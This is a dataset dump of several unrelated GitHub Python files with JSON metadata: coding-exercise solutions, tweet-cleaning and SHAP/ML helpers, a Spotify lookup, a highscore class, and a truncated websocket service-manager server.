все лишние символы удаляем\ntext_that_matter = \"\".join(list(filter(lambda x: x>=\"а\" and x<=\"я\" or x>=\"a\" and x<=\"z\" or x == \"ё\" or x == \" \", text)))\n# разбиваем текст на слова\nwords = text_that_matter.split(\" \")\n# удаляем все слова короче 6 букв\nwords = list(filter(lambda x: len(x) > 5, words))\nprint(words)\n","repo_name":"Shorstko/mai_python_2019","sub_path":"04 Lambdas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11826,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42014104504","text":"# https://www.acwing.com/problem/content/1211/\n\nn = int(input())\nlength = len(str(n))\nstate = [0] * 10\ncnt = 0\n\n\ndef dfs_c(a, c):\n b = c * (n - a)\n if len(str(a)) + len(str(b)) + len(str(c)) > 9:\n return\n if set(str(a) + str(b) + str(c)) == set(\"123456789\"):\n global cnt\n cnt += 1\n for i in range(1, 10):\n if state[i] == 0:\n state[i] = 1\n dfs_c(a, c * 10 + i)\n state[i] = 0\n\n\ndef dfs_a(a):\n if a >= n:\n return\n if a != 0:\n dfs_c(a, 0)\n for i in range(1, 10):\n if state[i] == 0:\n state[i] = 1\n dfs_a(a * 10 + i)\n state[i] = 0\n\n\ndfs_a(0)\nprint(cnt)\n\n\n\n\n","repo_name":"SumilerJR/algorithms","sub_path":"2022年11月/04 AcWing 1209. 带分数/带分数.py","file_name":"带分数.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10546581507","text":"def solution(progresses, speeds):\r\n finish = []\r\n for i in range(len(speeds)):\r\n remnant = 100 - progresses[i]\r\n if remnant%speeds[i] == 0:\r\n finish.append(remnant//speeds[i])\r\n else:\r\n finish.append(remnant//speeds[i]+1)\r\n \r\n cnt, ret = 0, []\r\n x = finish[0]\r\n for i in range(1, len(finish)):\r\n cnt += 1\r\n if x < finish[i]:\r\n ret.append(cnt)\r\n cnt, x = 0, finish[i]\r\n ret.append(cnt+1)\r\n return ret","repo_name":"yws1502/Algorithm","sub_path":"2차_Play_Data/11_기능개발.py","file_name":"11_기능개발.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31043410418","text":"from authspot import authorise_connection, setup_config\nimport spotipy\n\nimport spotipy\nimport sys\nfrom spotipy.oauth2 import SpotifyClientCredentials\n\n\ndef return_artist_info(artist_name, spotify):\n results = spotify.search(q=\"artist:\" + artist_name, type=\"artist\")\n items = results[\"artists\"][\"items\"]\n if len(items) > 0:\n artist = items[0]\n artist_info = {\n \"Artist\": items[0][\"name\"],\n \"image\": artist[\"images\"][0][\"url\"],\n \"genres\": items[0][\"genres\"],\n \"id\": items[0][\"id\"],\n \"href\": items[0][\"href\"],\n \"images\": items[0][\"images\"],\n \"popularity\": items[0][\"popularity\"],\n \"type\": items[0][\"type\"],\n \"uri\": items[0][\"uri\"],\n }\n return artist_info\n\n\nif __name__ == \"__main__\":\n config, client_id, client_secret = setup_config()\n spotify = authorise_connection(client_id, client_secret)\n artist_info = return_artist_info(\"R.A.P Ferreira\", spotify)\n print(artist_info)\n","repo_name":"conork92/musicboxd","sub_path":"musicboxd/get_artist.py","file_name":"get_artist.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"18416622955","text":"# inspired from: https://github.com/explosion/spaCy/blob/master/spacy/about.py\n\n__title__ = \"access_niu\"\n__version__ = \"0.0.2dev\"\n__summary__ = 
\"Production grade Natural Image Understanding\"\n__uri__ = \"http://accessai.co\"\n__author__ = \"ConvexHull Technology\"\n__email__ = \"contact@accessai.co\"\n__license__ = \"Apache 2.0\"\n__release__ = False\n","repo_name":"accessai/access-niu","sub_path":"access_niu/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"} +{"seq_id":"11219433801","text":"from sys import stdin,stdout\n\nwhile True:\n\tn = input()\n\tif n == -1: break\n\tarr = map(int,stdin.readline().split())\n\tvistos = set(arr)\n\tarr.sort()\n\tsoma,res = sum(arr),0\n\tl,r = (n-2)/2, (n-1)/2\n\n\tif arr[r] - arr[l] - 1:\n\t\tsol = soma/(n-1)\n\t\tif sol == int(sol) and sol not in vistos and arr[l] < sol < arr[r] and (sol+soma)/n == sol: res += 1\n\n\tif l < len(arr):\n\t\tsol = arr[l]*n - soma\n\t\tif -10**15 < sol < arr[l] and sol == int(sol) and sol not in vistos and (sol+soma)/n == arr[l]: res += 1\n\n\tif r < len(arr) :\n\t\tsol = arr[r]*n - soma\n\t\tif arr[r] < sol < 10**15 and sol == int(sol) and sol not in vistos and (sol+soma)/n == arr[r]: res += 1\n\n\tstdout.write(str(res)+'\\n')","repo_name":"EduardoMCF/Competitive-Programming","sub_path":"OnlineJudges/URI/Equilíbrio-1990.py","file_name":"Equilíbrio-1990.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71224946958","text":"import argparse\nfrom datetime import datetime\nimport logging\nimport re\nimport string\nfrom multiprocessing import Pool\nfrom typing import List, Tuple\n\nimport nltk\nimport pandas as pd\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\nfrom nltk.tokenize import TweetTokenizer\nfrom tqdm import tqdm\n\nlogging.basicConfig(\n format=\"%(asctime)s | %(levelname)s: %(message)s\", level=logging.INFO\n)\n\n# Instantiate the stemmer, lemmatizer and tokenizer objects\nstemmer = PorterStemmer()\nlemmatizer = WordNetLemmatizer()\ntokenizer = TweetTokenizer()\n\n# Get stopwords\nstopwords = list(nltk.corpus.stopwords.words(\"english\"))\n\n\ndef parse_arguments():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", help=\"Path to pickle with Tweets\")\n parser.add_argument(\"-n\", \"--njobs\", type=int, default=4)\n return parser.parse_args()\n\n\ndef _clean_tweet(tweet: str) -> Tuple[List[str], List[str]]:\n # Lowercasing words\n tweet = tweet.lower()\n\n tweet = re.sub(r\"…\", \"\", tweet)\n\n # Removing '&' which was found to be common\n tweet = re.sub(r\"&\", \"\", tweet)\n\n # Replace other instances of \"&\" with \"and\"\n tweet = re.sub(r\"&\", \"and\", tweet)\n\n # Removing mentions\n tweet = re.sub(r\"@\\w+ \", \"\", tweet)\n\n # Removing 'RT' and 'via'\n tweet = re.sub(r\"(^rt|^via)((?:\\b\\W*@\\w+)+): \", \"\", tweet)\n\n # Removing emojis\n EMOJI_PATTERN = re.compile(\n \"[\"\n \"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n \"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n \"\\U0001F600-\\U0001F64F\" # emoticons\n \"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n \"\\U0001F700-\\U0001F77F\" # alchemical symbols\n \"\\U0001F780-\\U0001F7FF\" # Geometric Shapes Extended\n \"\\U0001F800-\\U0001F8FF\" # Supplemental Arrows-C\n \"\\U0001F900-\\U0001F9FF\" # Supplemental Symbols and Pictographs\n \"\\U0001FA00-\\U0001FA6F\" # Chess Symbols\n \"\\U0001FA70-\\U0001FAFF\" # Symbols and Pictographs Extended-A\n \"\\U00002702-\\U000027B0\" # Dingbats\n \"\\U000024C2-\\U0001F251\"\n 
\"]+\"\n )\n\n tweet = re.sub(EMOJI_PATTERN, \"\", tweet)\n\n # Removing punctuation\n my_punctuation = string.punctuation.replace(\"#\", \"\")\n my_punctuation = my_punctuation.replace(\"-\", \"\")\n\n tweet = tweet.translate(str.maketrans(\"\", \"\", my_punctuation))\n tweet = re.sub(\n r\" - \", \"\", tweet\n ) # removing dash lines bounded by whitespace (and therefore not part of a word)\n tweet = re.sub(\n r\"[’“”—,!]\", \"\", tweet\n ) # removing punctuation that is not captured by string.punctuation\n\n # Removing odd special characters\n tweet = re.sub(r\"[┻┃━┳┓┏┛┗]\", \"\", tweet)\n tweet = re.sub(r\"\\u202F|\\u2069|\\u200d|\\u2066\", \"\", tweet)\n\n # Removing URLs\n tweet = re.sub(r\"http\\S+\", \"\", tweet)\n\n # Removing numbers\n tweet = re.sub(r\"[0-9]\", \"\", tweet)\n\n # Removing separators and superfluous whitespace\n tweet = tweet.strip()\n tweet = re.sub(r\" +\", \" \", tweet)\n\n # Tokenizing\n tokens = tokenizer.tokenize(tweet)\n\n # Removing stopwords\n tokens = [w for w in tokens if w not in stopwords]\n\n # Lemmatize or stem the tok\n stems = [stemmer.stem(w) for w in tokens]\n lemmas = [lemmatizer.lemmatize(w) for w in tokens]\n\n return stems, lemmas\n\n\ndef process_text(tweets: list, n_jobs: int = 4):\n \"\"\"\n Maps the text processing to n workers.\n \"\"\"\n with Pool(n_jobs) as p:\n # stems, lemmas =\n return tqdm(\n zip(*p.imap(_clean_tweet, tweets)),\n total=len(tweets),\n )\n\n\ndef _get_bigrams(unigram: list) -> list:\n \"\"\"\n Takes list of unigrams and converts them to bigrams\n \"\"\"\n return [\n \"_\".join([unigram[i], unigram[i + 1]])\n for i, _ in enumerate(unigram)\n if i != len(unigram) - 1\n ]\n\n\ndef main():\n\n args = parse_arguments()\n logging.info(f\"Reading dataset: {args.input}\")\n df = pd.read_parquet(args.input, engine = \"fastparquet\")\n\n logging.info(f\"Processing {df.shape[0]} tweets across {args.njobs} workers\")\n df[\"stems\"], df[\"lemmas\"] = process_text(df[\"text\"].tolist(), args.njobs)\n logging.info(\"Text processed. 
Getting bigrams\")\n\n df[\"stems_bigrams\"] = df[\"stems\"].apply(_get_bigrams) + df[\"stems\"]\n df[\"lemmas_bigrams\"] = df[\"lemmas\"].apply(_get_bigrams) + df[\"lemmas\"]\n\n parquet_path = \"2022-11-13_processed.parquet\"\n logging.info(f\"Saving to {parquet_path}\")\n df.to_parquet(parquet_path, engine = \"pyarrow\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CDHUppsala/alt-right-formations","sub_path":"analysis/process_txt.py","file_name":"process_txt.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40085885766","text":"class Solution:\n def maxConsecutive(self, bottom: int, top: int, special: List[int]) -> int:\n lb = bottom\n ans = 0\n special.sort()\n \n \n for i in range(len(special)):\n cns = special[i] - lb\n ans = max(cns,ans)\n lb = special[i] + 1\n \n ans = max(ans,top - lb + 1)\n \n return ans\n \n \n ","repo_name":"rajat844/Leetcode2022","sub_path":"2274-maximum-consecutive-floors-without-special-floors/2274-maximum-consecutive-floors-without-special-floors.py","file_name":"2274-maximum-consecutive-floors-without-special-floors.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7245539846","text":"# -*- coding: utf-8 -*-\n\nimport warnings\nwarnings.simplefilter(\"ignore\", UserWarning)\n\nimport numpy as np\nimport h5py\nimport os\nimport json\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport missingno as mno\nimport seaborn as sns\nfrom sklearn import linear_model\nimport math\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn import metrics\nfrom sklearn import svm\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom bayes_opt import BayesianOptimization\nfrom joblib import Parallel, delayed\nfrom sklearn import svm, datasets\nfrom matplotlib.pyplot import figure\nfrom scipy.stats import ttest_ind\nimport copy\nimport random\nimport shap\nimport re\n\n\ndef calc_shap(shap_values, X, expected_value):\n \n explanation = copy.copy(shap.Explanation(shap_values,\n base_values=np.array(np.full((len(X), ), np.array(expected_value))),\n data=X.values,\n feature_names=list(X.columns)))\n \n return explanation\n\ndef get_importance(class_idx, beta, feature_names, intercepts=None):\n \"\"\"\n Retrive and sort abs magnitude of coefficients from model.\n \"\"\"\n\n # sort the absolute value of model coef from largest to smallest\n srt_beta_k = np.argsort(np.abs(beta[class_idx, :]))[::-1]\n feat_names = [feature_names[idx] for idx in srt_beta_k]\n feat_imp = beta[class_idx, srt_beta_k]\n # include bias among feat importances\n if intercepts is not None:\n intercept = intercepts[class_idx]\n bias_idx = len(feat_imp) - np.searchsorted(np.abs(feat_imp)[::-1], np.abs(intercept) )\n feat_imp = np.insert(feat_imp, bias_idx, intercept.item(), )\n intercept_idx = np.where(feat_imp == intercept)[0][0]\n feat_names.insert(intercept_idx, 'bias')\n\n return feat_imp, feat_names\n\n\n\ndef reorder_feats(vals_and_names, 
src_vals_and_names):\n \"\"\"Given two tuples, each containing a list of ranked feature\n shap values and the corresponding feature names, the function\n reorders the values in vals according to the order specified in\n the list of names contained in src_vals_and_names.\n \"\"\"\n\n _, src_names = src_vals_and_names\n vals, names = vals_and_names\n reordered = np.zeros_like(vals)\n\n for i, name in enumerate(src_names):\n alt_idx = names.index(name)\n reordered[i] = vals[alt_idx]\n\n return reordered, src_names\n\ndef compare_avg_mag_shap(class_idx, comparisons, baseline, **kwargs):\n \"\"\"\n Given a list of tuples, baseline, containing the feature values and a list with feature names\n for each class and, comparisons, a list of lists with tuples with the same structure, the\n function reorders the values of the features in comparisons entries according to the order\n of the feature names provided in the baseline entries and displays the feature values for comparison.\n \"\"\"\n\n methods = kwargs.get(\"methods\", [f\"method_{i}\" for i in range(len(comparisons) + 1)])\n\n n_features = len(baseline[class_idx][0])\n\n # bar settings\n bar_width = kwargs.get(\"bar_width\", 0.05)\n bar_space = kwargs.get(\"bar_space\", 2)\n\n # x axis\n x_low = kwargs.get(\"x_low\", 0.0)\n x_high = kwargs.get(\"x_high\", 1.0)\n x_step = kwargs.get(\"x_step\", 0.05)\n x_ticks = np.round(np.arange(x_low, x_high + x_step, x_step), 3)\n\n # y axis (these are the y coordinate of start and end of each group\n # of bars)\n start_y_pos = np.array(np.arange(0, n_features))*bar_space\n end_y_pos = start_y_pos + bar_width*len(methods)\n y_ticks = 0.5*(start_y_pos + end_y_pos)\n\n # figure\n fig_x = kwargs.get(\"fig_x\", 10)\n fig_y = kwargs.get(\"fig_y\", 7)\n\n # fontsizes\n title_font = kwargs.get(\"title_fontsize\", 20)\n legend_font = kwargs.get(\"legend_fontsize\", 20)\n tick_labels_font = kwargs.get(\"tick_labels_fontsize\", 20)\n axes_label_fontsize = kwargs.get(\"axes_label_fontsize\", 10)\n\n # labels\n title = kwargs.get(\"title\", None)\n ylabel = kwargs.get(\"ylabel\", None)\n xlabel = kwargs.get(\"xlabel\", None)\n\n # process input data\n methods = list(reversed(methods))\n base_vals = baseline[class_idx][0]\n ordering = baseline[class_idx][1]\n comp_vals = []\n\n # reorder the features so that they match the order of the baseline (ordering)\n for comparison in comparisons:\n vals, ord_ = reorder_feats(comparison[class_idx], baseline[class_idx])\n comp_vals.append(vals)\n assert ord_ is ordering\n\n all_vals = [base_vals] + comp_vals\n data = dict(zip(methods, all_vals))\n df = pd.DataFrame(data=data, index=ordering)\n\n # plotting logic\n fig, ax = plt.subplots(figsize=(fig_x, fig_y))\n\n for i, col in enumerate(df.columns):\n values = list(df[col])\n y_pos = [y + bar_width*i for y in start_y_pos]\n ax.barh(y_pos, list(values), bar_width, label=col)\n\n # add ticks, legend and labels\n ax.set_xticks(x_ticks)\n ax.set_xticklabels([str(x) for x in x_ticks], rotation=45, fontsize=tick_labels_font)\n ax.set_xlabel(xlabel, fontsize=axes_label_fontsize)\n ax.set_yticks(y_ticks)\n ax.set_yticklabels(ordering, fontsize=tick_labels_font)\n ax.set_ylabel(ylabel, fontsize=axes_label_fontsize)\n ax.invert_yaxis() # labels read top-to-bottom\n ax.legend(fontsize=legend_font)\n\n plt.grid(True)\n plt.title(title, fontsize=title_font)\n\n return ax, fig, df\n\ndef _flatten(X):\n img_size = X[0].shape\n X = X.reshape([X.shape[0], np.prod(img_size)])\n return(X)\n\n\ndef split_set(X, y, fraction, random_state=0):\n 
\"\"\"\n Given a set X and associated labels y, splits off a fraction of the data and its labels.\n \"\"\"\n _, X_split, _, y_split = train_test_split(X,\n y,\n test_size=fraction,\n random_state=random_state,\n )\n print(\"Number of records: {}\".format(X_split.shape[0]))\n print(\"Number of class {}: {}\".format(0, len(y_split) - y_split.sum()))\n print(\"Number of class {}: {}\".format(1, y_split.sum()))\n\n return X_split, y_split\n\ndef plot_importance(feat_imp, feat_names, class_idx, **kwargs):\n \"\"\"\n Create a horizontal barchart of feature effects, sorted by their magnitude.\n \"\"\"\n\n left_x, right_x = kwargs.get(\"left_x\"), kwargs.get(\"right_x\")\n eps_factor = kwargs.get(\"eps_factor\", 4.5)\n\n fig, ax = plt.subplots(figsize=(20, 10))\n y_pos = np.arange(len(feat_imp))\n ax.barh(y_pos, feat_imp)\n ax.set_yticks(y_pos)\n ax.set_yticklabels(feat_names, fontsize=9)\n ax.invert_yaxis() # labels read top-to-bottom\n ax.set_xlabel(f'Feature effects for class {class_idx}', fontsize=9)\n ax.set_xlim(left=left_x, right=right_x)\n\n for i, v in enumerate(feat_imp):\n eps = 0.03\n if v < 0:\n eps = -eps_factor*eps\n ax.text(v + eps, i + .25, str(round(v, 3)))\n\n return ax, fig\n\ndef permute_columns(X, feat_names, perm_feat_names):\n \"\"\"\n Permutes the original dataset so that its columns\n (ordered according to feat_names) have the order\n of the variables after transformation with the\n sklearn preprocessing pipeline (perm_feat_names).\n \"\"\"\n\n perm_X = np.zeros_like(X)\n perm = []\n for i, feat_name in enumerate(perm_feat_names):\n feat_idx = feat_names.index(feat_name)\n perm_X[:, i] = X[:, feat_idx]\n perm.append(feat_idx)\n return perm_X, perm\n\ndef create_category_map(X_data , limit = 10):\n \"\"\"creates a category map from a DataFrame and lists of column numbers\n \n \n input : DataFrame\n return: Dictionary : category map \n List : column number of category columns\n List : column number of numerical columns\n \"\"\"\n \n category_map = {}\n\n for i,col_name in enumerate(X_data.columns):\n unique_len = len(X_data[col_name].dropna().unique())\n\n if unique_len == 2 or unique_len < limit:\n print(col_name,\" : \", unique_len)\n\n category_map[i] = []\n\n if np.isnan(list(X_data[col_name].unique())).any():\n category_map[i].append(np.nan)\n\n cat_values = list(X_data[col_name].dropna().unique())\n cat_values.sort()\n\n for cat_value in cat_values:\n category_map[i].append(cat_value)\n \n ordinal_features = [x for x in range(len(X_data.columns)) if x not in list(category_map.keys())]\n categorical_features = list(category_map.keys())\n \n return category_map,categorical_features,ordinal_features,list(X_data.columns)\n\n\ndef get_featnames(preprocessor, \n categorical_features,\n ordinal_features,\n feature_names):\n fts = [feature_names[x] for x in categorical_features]\n ohe = preprocessor.transformers_[1][1].named_steps['onehot']\n cat_enc_feat_names = ohe.get_feature_names(fts)\n feat_enc_dim = [len(cat_enc) - 1 for cat_enc in ohe.categories_]\n start=len(ordinal_features)\n cat_feat_start = [start]\n for dim in feat_enc_dim[:-1]:\n cat_feat_start.append(dim + cat_feat_start[-1])\n numerical_feats_idx = preprocessor.transformers_[0][2]\n categorical_feats_idx = preprocessor.transformers_[1][2]\n scaler = preprocessor.transformers_[0][1].named_steps['scaler']\n num_feats_names = [feature_names[i] for i in numerical_feats_idx]\n cat_feats_names = [feature_names[i] for i in categorical_feats_idx]\n perm_feat_names = num_feats_names + cat_feats_names\n \n return 
num_feats_names,cat_feats_names,perm_feat_names,cat_feat_start,feat_enc_dim,fts","repo_name":"mendeltem/medical_data_analyse","sub_path":"library/ml_lib.py","file_name":"ml_lib.py","file_ext":"py","file_size_in_byte":10096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16122916448","text":"import os.path\n\ndef sortSecond(val): \n return val[1]\n\nclass Highscore:\n\n def __init__(self):\n self.file_name = 'data/highscore'\n if not os.path.exists(self.file_name):\n self.reset()\n\n\n def __str__(self):\n lines = []\n lines.append('\\nHIGHSCORE')\n scores = []\n with open(self.file_name) as fp:\n for cnt, line in enumerate(fp):\n hs = line.replace(\" \", \"\").strip().split('\\t')\n scores.append([hs[0], int(hs[1])])\n \n scores.sort(key=sortSecond, reverse=True)\n rank = 1\n for name, score in scores:\n lines.append('Rank #{0} \\t Name: {1} \\t Points: {2}'.format(rank, name, score))\n rank += 1\n\n\n return '\\n'.join(lines)\n\n\n def write(self, score):\n input('Press Enter to add to highscore')\n name = input('Enter your name:')\n file = open(self.file_name, 'a+')\n file.write('{0} \\t {1} \\n'.format(name, score))\n file.close()\n\n\n def reset(self):\n file = open(self.file_name, 'w+')\n file.write('')\n file.close()\n\n","repo_name":"simonfranzen/deepq-tetris","sub_path":"highscore.py","file_name":"highscore.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"22265515307","text":"import time\r\nstart=time.time()\r\ndata=map(int,input())\r\nbound=1000000\r\narr=[0]*(bound)\r\narr[1]=1\r\nfor i in range(2,bound):\r\n n=i\r\n cycle=1\r\n while n!=1:\r\n if n%2!=0:\r\n n=3*n+1\r\n cycle+=1\r\n n//=2\r\n cycle+=1\r\n if nb:\r\n a,b=b,a\r\n m=max(arr[a:b+1])\r\n print(p,q,m)\r\n \r\nend=time.time()\r\nrun=end-start\r\nprint(run)\r\n ","repo_name":"forestbird3/forest_bird","sub_path":"contents.py","file_name":"contents.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34504821552","text":"import multiprocessing\nimport asyncio\nimport websockets\nfrom websockets.exceptions import ConnectionClosed, ConnectionClosedError\nimport traceback, logging\nimport json\nfrom json.decoder import JSONDecodeError\nfrom path import Path\nfrom uuid import uuid4 as uuidv4\nfrom collections import defaultdict\nfrom servman.typings import IConnectionConfig, IParcel\nfrom servman.service_pool import ServicePool, Pipeline\nfrom typing import Callable\n\n\nclass ServiceManager:\n \"\"\"\n A task scheduler and communication proxy between clients\n and scheduled tasks called services. Server-like.\n\n The ServiceManager object is the core of the servman project.\n Basic usage is to create a ServiceManager and then tell it which tasks\n you would like to run. Meanwhile, it will automatically create a websocket\n server based on the configuration file you provide for it. 
You usually\n will want to design your Client and corresponding Service to connect\n to the ServiceManager.\n\n A simple heartbeat.py project is available in the examples folder.\n For a more complex integration, checkout the MafiaBot project which\n uses discord.py (https://github.com/dggfi/MafiaBot)\n \"\"\"\n def __init__(self, config_path, log_filename='logs/servman.log'):\n self._agent_id = str(uuidv4())\n\n # Config\n config_path = Path(config_path)\n\n if not config_path.exists():\n print(f\"Error: File {config_path} does not exist.\")\n exit()\n\n config = ''\n\n try:\n config = json.loads(config_path.read_text())\n except JSONDecodeError:\n print(f\"The JSON in {config_path} is not formatted correctly.\")\n exit()\n\n self.config: IConnectionConfig = config\n\n # Actions\n actions = {\n 'create_service': self.create_service,\n 'join_service_pool': self.join_service_pool,\n 'hook_into_pool': self.hook_into_pool,\n 'kill': self.kill,\n }\n\n def return_bad_action(): return self.bad_action\n self._actions = defaultdict(return_bad_action, actions)\n\n # Routes\n routes = {\n 'servman': self.open_here,\n 'client': self.route_to_other,\n 'service': self.route_to_other\n }\n\n def return_bad_route(): return self.bad_route\n self.routes = defaultdict(return_bad_route, routes)\n\n self.allowed_agents = set([\n 'client',\n 'service'\n ])\n\n # Websockets API\n self.host = config['host']\n self.port = config['port']\n self.connection_config = {\n 'host': self.host,\n 'port': self.port\n }\n\n # Collections\n self.id_to_websocket = {} # connection_id: websocket\n self.identifier_to_service_pools = {} # identifier: ServicePool\n self.tasks = {} # str: Callable\n self.client_pool_identifiers = {} # agent_id: set([identifiers])\n self.pending_pipelines = {}\n\n # Misc.\n self.t_ping = None\n self.n_messages = 0\n\n # Logger\n self.logger = logging.getLogger(\"websockets.server\")\n self.logger.setLevel(logging.INFO)\n # log_destination = Path(log_filename)\n handler = logging.FileHandler(filename=log_filename, encoding='utf-8', mode='w')\n handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\n self.logger.addHandler(handler)\n \n # Security\n self.killed = False\n self.secret = 'my_secret'\n\n\n ### Websocket\n async def register_websocket(self, websocket):\n agent = ''\n connection_id = ''\n proxy = 'false'\n try:\n agent = websocket.request_headers['agent']\n connection_id = websocket.request_headers['connection_id']\n proxy = websocket.request_headers['proxy']\n except KeyError:\n response: IParcel = { \n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_servman_error',\n 'data': { 'exception': 'HeaderMissing', 'message': \"Websocket missing critical field in request header.\" }\n }\n await websocket.send(json.dumps(response))\n await websocket.close()\n return\n \n if agent not in self.allowed_agents:\n response: IParcel = { \n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_servman_error',\n 'data': { 'exception': 'HeaderMissing', 'message': \"Websocket missing critical field in request header.\" }\n }\n await websocket.send(json.dumps(response))\n await websocket.close()\n return\n \n # Test whether the websocket is an original agent-to-servman connection\n # or if it should be a proxy connection \n existing_socket = self.id_to_websocket.get(connection_id, None)\n if existing_socket:\n response: IParcel = {\n 'routing': agent,\n 'action': 'handle_servman_error',\n 'data': { 'parcel': None, 'exception': 
'ConnectionExists', 'message': f\"Websocket with agent_id/connection_id {connection_id} already exists!\" }\n }\n await existing_socket.send(json.dumps(response))\n await websocket.close()\n return\n\n self.id_to_websocket[connection_id] = websocket\n if proxy == 'true':\n await self.build_pipeline(websocket)\n\n\n async def unregister_websocket(self, websocket):\n \"\"\"\n There may be concurrency issues when a client with multiple\n connections drops.\n \"\"\"\n\n connection_id = websocket.request_headers['connection_id']\n\n # Remove references\n self.id_to_websocket.pop(connection_id)\n agent_id = websocket.request_headers['agent_id']\n if agent_id in self.client_pool_identifiers:\n identifiers = self.client_pool_identifiers[agent_id]\n identifiers = set([i for i in identifiers if i in self.identifier_to_service_pools])\n orphaned_identifiers = set([i for i in identifiers if websocket is self.identifier_to_service_pools[i].owner_websocket and self.identifier_to_service_pools[i].close_on_disconnect])\n identifiers = identifiers - orphaned_identifiers\n if identifiers:\n self.client_pool_identifiers[agent_id] = identifiers\n else:\n if agent_id in self.client_pool_identifiers: self.client_pool_identifiers.pop(agent_id)\n for identifier in orphaned_identifiers:\n pool = self.identifier_to_service_pools.pop(identifier)\n # Defer socket closure to service pool\n await pool.close(agent_id)\n \n\n ### Actions -- Error\n async def bad_action(self, parcel: IParcel, websocket):\n self.logger.error(f\"Error: Got a bad action! '{parcel['action']}' in parcel {parcel}\")\n \n\n async def bad_route(self, parcel: IParcel, websocket):\n self.logger.error(f\"Error: Got a bad route! '{parcel['routing']}' in parcel {parcel}\")\n \n\n # Actions -- Parcels\n async def open_here(self, parcel: IParcel, websocket):\n await self._actions[parcel['action']](parcel, websocket)\n\n\n async def route_to_other(self, parcel: IParcel, websocket):\n destination_websocket = self.id_to_websocket[parcel['destination_id']]\n await destination_websocket.send(json.dumps(parcel))\n\n\n ### Actions -- Services\n async def create_service(self, parcel: IParcel, websocket):\n identifier = parcel['data']['kwargs']['identifier']\n\n # Check for existing service pool\n existing_service_pool: ServicePool = self.identifier_to_service_pools.get(identifier, None)\n if existing_service_pool and websocket is existing_service_pool.owner_websocket:\n response: IParcel = {\n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_servman_error',\n 'data': { 'exception': 'ServiceCollision', 'message': f'Service with identifier {identifier} already exists' }\n }\n await websocket.send(json.dumps(response))\n return\n elif existing_service_pool and websocket is not existing_service_pool.owner_websocket:\n agent_id = websocket.request_headers['agent_id']\n response: IParcel = {\n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_security_alert',\n 'data': { 'alert': 'ServiceCollision', 'message': f\"Agent with ID {agent_id} attempted to overwrite existing service {identifier}\" }\n }\n await existing_service_pool.owner_websocket.send(json.dumps(response))\n return\n # No service_pool found? 
Let's make one\n target = parcel['data']['target']\n task = self.tasks[target]\n\n args = parcel['data']['args']\n kwargs = parcel['data']['kwargs']\n\n owner_id = websocket.request_headers['agent_id']\n params = { 'args': args, 'kwargs': kwargs }\n\n options = parcel['data']['options']\n\n new_service_pool = ServicePool(identifier, owner_id, websocket, task, params, **options)\n self.identifier_to_service_pools[identifier] = new_service_pool\n\n agent = websocket.request_headers['agent']\n if agent == 'client':\n agent_id = websocket.request_headers['agent_id']\n if agent_id in self.client_pool_identifiers:\n self.client_pool_identifiers[agent_id].add(identifier)\n else:\n self.client_pool_identifiers[agent_id] = set([identifier])\n\n new_service_pool.run()\n\n async def join_service_pool(self, parcel: IParcel, websocket):\n \"\"\"\n A client may join a service pool through this action.\n \"\"\"\n identifier = parcel['data']['identifier']\n service_pool = await self.get_service_pool(identifier, websocket)\n if service_pool:\n await service_pool.add_client_connection(websocket)\n\n async def hook_into_pool(self, parcel: IParcel, websocket):\n \"\"\"\n Every service should send this action once.\n\n Hook logic is implemented by default in the ServmanAgent\n helper.\n \"\"\"\n identifier = parcel['data']['identifier']\n service_pool: ServicePool or None = await self.get_service_pool(identifier, websocket)\n if service_pool: \n service_pool.service_connection = websocket\n\n async def close_service(self, parcel: IParcel, websocket):\n identifier = parcel['data']['service_identifer']\n service_pool: ServicePool = await self.get_service_pool(identifier, websocket)\n if service_pool:\n await service_pool.close(identifier)\n \n async def kill(self, parcel: IParcel, websocket):\n secret = parcel['data']['secret']\n if secret == self.secret:\n self.killed = True\n 